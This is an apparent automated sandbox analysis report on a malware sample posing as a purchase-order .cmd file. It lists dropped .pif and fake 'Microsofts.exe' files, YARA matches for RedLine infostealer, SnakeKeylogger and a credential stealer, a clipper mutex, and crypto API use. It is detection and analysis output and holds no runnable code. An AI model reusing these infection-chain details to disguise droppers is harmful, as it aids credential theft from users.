Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_1_00402F89	26_1_00402F89
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_1_00402B90	26_1_00402B90
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_1_004073A0	26_1_004073A0
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: 28_2_02AA20C4	28_2_02AA20C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_2_00408C60	31_2_00408C60
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_2_0040DC11	31_2_0040DC11
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_2_00407C3F	31_2_00407C3F
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_2_00418CCC	31_2_00418CCC
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_2_00406CA0	31_2_00406CA0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_2_004028B0	31_2_004028B0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_2_0041A4BE	31_2_0041A4BE
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_2_00418244	31_2_00418244
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_2_00401650	31_2_00401650
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_2_00402F20	31_2_00402F20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_2_004193C4	31_2_004193C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_2_00418788	31_2_00418788
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_2_00402F89	31_2_00402F89
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_2_00402B90	31_2_00402B90
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_2_004073A0	31_2_004073A0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_2_2D001020	31_2_2D001020
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_2_2D001030	31_2_2D001030
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_2_31FC47B8	31_2_31FC47B8
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_2_31FC47A8	31_2_31FC47A8
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_1_00408C60	31_1_00408C60
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_1_0040DC11	31_1_0040DC11
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_1_00407C3F	31_1_00407C3F
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_1_00418CCC	31_1_00418CCC
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_1_00406CA0	31_1_00406CA0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_1_004028B0	31_1_004028B0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_1_0041A4BE	31_1_0041A4BE
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_1_00418244	31_1_00418244
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_1_00401650	31_1_00401650
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_1_00402F20	31_1_00402F20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_1_004193C4	31_1_004193C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_1_00418788	31_1_00418788
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_1_00402F89	31_1_00402F89
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_1_00402B90	31_1_00402B90
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_1_004073A0	31_1_004073A0

Source: Joe Sandbox View

Dropped File: C:\Users\Public\Libraries\rpkhzpuO.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02B38798 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02B244D0 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02B246A4 appears 244 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02B3881C appears 45 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02B2480C appears 931 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02B244AC appears 73 times
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: String function: 02BC480C appears 619 times
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: String function: 02AB8798 appears 48 times
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: String function: 02AA46A4 appears 154 times
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: String function: 02BD8798 appears 48 times
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: String function: 02BC46A4 appears 154 times
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: String function: 02AA480C appears 619 times
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: String function: 00415639 appears 48 times
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: String function: 0040FB9C appears 80 times
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: String function: 0040D606 appears 192 times
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: String function: 0040E1D8 appears 352 times
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: String function: 0040E76A appears 32 times

Source: PO_KB#67897.cmd

Binary or memory string: OriginalFilenamemsedge.exe> vs PO_KB#67897.cmd

Source: 31.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 21.2.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 31.2.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 21.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 8.2.rpkhzpuO.pif.265ad410.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.rpkhzpuO.pif.265ad410.11.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 31.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 26.2.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 31.2.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 8.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 26.2.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 26.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 21.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 26.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 8.2.rpkhzpuO.pif.265951f0.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.rpkhzpuO.pif.265951f0.13.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.rpkhzpuO.pif.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 8.2.rpkhzpuO.pif.2657cfc0.14.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.rpkhzpuO.pif.2657cfc0.14.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 21.2.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 8.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 8.2.rpkhzpuO.pif.265ad410.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.rpkhzpuO.pif.265ad410.11.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.rpkhzpuO.pif.265951f0.13.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.rpkhzpuO.pif.265951f0.13.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.0.Microsofts.exe.6e0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.0.Microsofts.exe.6e0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.rpkhzpuO.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 8.2.rpkhzpuO.pif.2657cfc0.14.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.rpkhzpuO.pif.2657cfc0.14.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000001A.00000002.2555582256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000001F.00000002.2653640305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000015.00000002.2463806238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000001A.00000001.2405390189.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000001F.00000001.2498527749.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000008.00000002.2209421224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: Process Memory Space: rpkhzpuO.pif PID: 3080, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Microsofts.exe PID: 3248, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: Microsofts.exe.8.dr, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Microsofts.exe.8.dr, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 8.3.rpkhzpuO.pif.2350ac48.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 8.3.rpkhzpuO.pif.2350ac48.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 8.3.rpkhzpuO.pif.2350ac48.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 8.2.rpkhzpuO.pif.264e6478.10.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 8.2.rpkhzpuO.pif.264e6478.10.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 8.2.rpkhzpuO.pif.264e6478.10.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 8.2.rpkhzpuO.pif.26523d90.12.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 8.2.rpkhzpuO.pif.26523d90.12.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 8.2.rpkhzpuO.pif.26523d90.12.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'

Source: apihost.exe.9.dr

Binary or memory string: }.sLn-

Source: classification engine

Classification label: mal100.troj.spyw.evad.winCMD@46/18@3/3

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B27F52 GetDiskFreeSpaceA,

4_2_02B27F52

Source: C:\Users\Public\Libraries\rpkhzpuO.pif

Code function: 8_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

8_2_004019F0

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B36D48 CoCreateInstance,

4_2_02B36D48

Source: C:\Users\Public\Libraries\rpkhzpuO.pif

8_2_004019F0

Source: C:\Users\user\AppData\Local\Temp\x.exe

File created: C:\Users\Public\OupzhkprF.cmd

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7016:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7008:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6708:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3784:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Phoenix_Clipper_666
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2792:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5936:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4904:120:WilError_03

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\user\AppData\Local\Temp\CAB00516.TMP

Jump to behavior

Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Command line argument: 08A	8_2_00413780
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Command line argument: 08A	8_2_00413780
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Command line argument: 08A	8_1_00413780
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Command line argument: 08A	21_2_00413780
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Command line argument: 08A	21_2_00413780
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Command line argument: 08A	21_1_00413780
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Command line argument: 08A	26_2_00413780
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Command line argument: 08A	26_2_00413780
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Command line argument: 08A	26_1_00413780
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Command line argument: 08A	31_2_00413780
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Command line argument: 08A	31_2_00413780
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Command line argument: 08A	31_1_00413780

Source: C:\Users\user\AppData\Local\Temp\x.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
